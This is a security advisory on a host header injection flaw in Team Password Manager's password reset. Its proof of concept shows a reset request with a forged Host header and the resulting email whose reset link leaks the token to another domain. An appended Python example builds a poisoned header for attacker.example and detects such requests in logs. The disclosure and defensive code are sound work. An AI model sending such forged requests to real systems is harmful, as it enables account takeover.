Advisory ID:               SYSS-2021-060
Product:                   Team Password Manager
Manufacturer:              Ferran Barba
Affected Version(s):       9.125.225 (released 2021-04-30)
Tested Version(s):         9.125.225 (released 2021-04-30)
Vulnerability Type:        Weak Password Recovery Mechanism for Forgotten
                           Password (CWE-640)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2021-10-28
Solution Date:             2021-11-12
Public Disclosure:         2021-11-30
CVE Reference:             CVE-2021-44037
Author of Advisory:        Stefan Walter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

"Team Password Manager is a self hosted (also called on-premises) web app
that helps companies manage lots of passwords across lots of projects.
It's specially designed for teams that need to manage several passwords
in each project, that have lots of projects and that each project is
shared among several people."

Password reset links can be manipulated to point to an
attacker-controlled server.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The web application allows users to reset their password at
/index.php/login/forgot_pwd. If a registered user enters their e-mail
address and submits the form, the server sends an e-mail containing a
password reset link to that address.

The value of the HTTP header "Host" of the reset request is reflected
unchanged in that password reset link. This is known as host header
injection (host header poisoning).

If the affected user is not careful and clicks on said link, the
information needed to set a new password, which is contained in the
link, is sent to the malicious server. With that, the attacker can take
over the victim's account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

For this proof of concept, a local instance of Team Password Manager was
set up using docker-compose, as described in [2].
"testinstallation" and "example.com" were configured in /etc/hosts as
aliases for 127.0.0.1. For testing purposes, a fake SMTP server was
started using `python3 -m aiosmtpd -n -l 0.0.0.0:25`.

Next, the request for a password reset of the user user@example.com was
intercepted in Burp and the Host header manually modified from
"testinstallation" to "syss.de". The result is shown in the following
request (non-essential headers have been removed in the listing):

POST /index.php/login/forgot_pwd HTTP/1.1
Host: syss.de
Cookie: PHPSESSID=h6kdo2t358piemhr4b3pr20ssh
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: https://testinstallation
Referer: https://testinstallation/index.php/login/forgot_pwd
[...]

csrft=fe414bfa1f4cb502c4c5b490be6b0734abfb74af&email=user%40example.com&submit=Submit

The resulting e-mail sent by Team Password Manager contains a password
reset link pointing to the manipulated domain syss.de:

$ python3 -m aiosmtpd -n -l 0.0.0.0:25
---------- MESSAGE FOLLOWS ----------
User-Agent: Team Password Manager
Date: Tue, 26 Oct 2021 11:33:51 +0000
From: "Team Password Manager"
Return-Path:
To: user@example.com
Subject: Team Password Manager: Forgot your =?UTF-8?B?cGFzc3dvcmQ/?=
Reply-To: "user@example.com"
X-Sender: user@example.com
X-Mailer: Team Password Manager
X-Priority: 3 (Normal)
Message-ID: <6177e79f1909a@example.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit
X-Peer: ('172.19.0.3', 33396)

This message is sent from your installation of Team Password Manager, on
your request to reset your password.
Click the following link or copy and paste it on your browser's address
bar to reset your password:

https://syss.de/index.php/login/reset_pwd/3/61b157d4c4680acc94adc65e1a06afe9ae3facbf/af0e0f1fbeed2df7064c43f150454e6f69ce4a9b
------------ END MESSAGE ------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update Team Password Manager to the patched version (10.135.236, see [3])
and correctly configure the password reset link URL under
Settings -> Password Reset -> Edit password reset URL.

We thank the vendor for quickly responding to our e-mail and providing a
solution.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-10-12: Vulnerability discovered
2021-10-28: Vulnerability reported to manufacturer
2021-11-12: Fixed in release 10.135.236 (see [3])
2021-11-30: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Team Password Manager
    https://teampasswordmanager.com/faq/what-is-teampasswordmanager/
[2] Installation procedure using docker-compose
    https://teampasswordmanager.com/docs/docker-compose/
[3] Changelog of the fixed version
    https://teampasswordmanager.com/docs/changelog/#10.135.236
[4] SySS Security Advisory SYSS-2021-060
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-060.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Stefan Walter of SySS GmbH.

E-Mail: stefan.walter@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Walter.asc
Key Fingerprint: 74DD 77CD 0317 2777 470D 38BE BE0B B311 DA3F 3E16

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind.
Details of this security advisory may be updated in order to provide as
accurate information as possible. The latest version of this security
advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
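Added example (not part of the SySS advisory and not the vendor's code): a Python model of the reflected-Host pattern described under Vulnerability Details, beside a hardened variant that builds the link from a configured base URL (cf. the "Edit password reset URL" setting) and rejects unexpected Host values, plus a check over constructed access-log lines that flags reset requests carrying an unexpected Host. The allowed host names, base URL, single-segment token and log format are assumptions.

```python
from urllib.parse import urlsplit, urlunsplit

# Assumed deployment values: the names the installation is legitimately
# reached under, and the configured reset URL (cf. "Edit password reset URL").
ALLOWED_HOSTS = {"testinstallation"}
CONFIGURED_BASE_URL = "https://testinstallation"
RESET_PATH = "/index.php/login/reset_pwd"

def reset_link_vulnerable(headers, user_id, token):
    """Flawed pattern: the client-supplied Host header ends up in the link."""
    host = headers.get("host", "localhost")
    return f"https://{host}{RESET_PATH}/{user_id}/{token}"

def reset_link_fixed(headers, user_id, token, base_url=CONFIGURED_BASE_URL,
                     allowed_hosts=ALLOWED_HOSTS):
    """Hardened: reject unexpected Host values and never copy Host into the link."""
    hostname = headers.get("host", "").split(":")[0].lower()  # drop any :port
    if hostname not in allowed_hosts:
        raise ValueError(f"unexpected Host header: {hostname!r}")
    base = urlsplit(base_url)
    path = f"{RESET_PATH}/{user_id}/{token}"
    return urlunsplit((base.scheme, base.netloc, path, "", ""))

# Constructed access-log lines (timestamp, Host header, method, path); not real traffic.
SAMPLE_LOG = [
    "2021-10-26T11:33:51Z testinstallation POST /index.php/login/forgot_pwd",
    "2021-10-26T11:33:52Z attacker.example POST /index.php/login/forgot_pwd",
    "2021-10-26T11:34:10Z testinstallation:443 GET /index.php/login",
    "2021-10-26T11:35:00Z attacker.example GET /index.php/login",
]

def find_forgot_pwd_host_mismatches(log_lines, allowed_hosts=ALLOWED_HOSTS):
    """Detection: reset requests whose Host header is not an allowed name."""
    hits = []
    for line in log_lines:
        ts, host, _method, path = line.split()
        if path.endswith("/login/forgot_pwd") and host.split(":")[0].lower() not in allowed_hosts:
            hits.append((ts, host))
    return hits

if __name__ == "__main__":
    poisoned = {"host": "attacker.example"}  # constructed request headers
    print(reset_link_vulnerable(poisoned, 3, "TOKEN"))  # link points at attacker.example
    print(find_forgot_pwd_host_mismatches(SAMPLE_LOG))
```

The hardened builder also strips a trailing port before checking the allowlist, so a legitimate `Host: testinstallation:443` is accepted while the link is still taken from the configured URL.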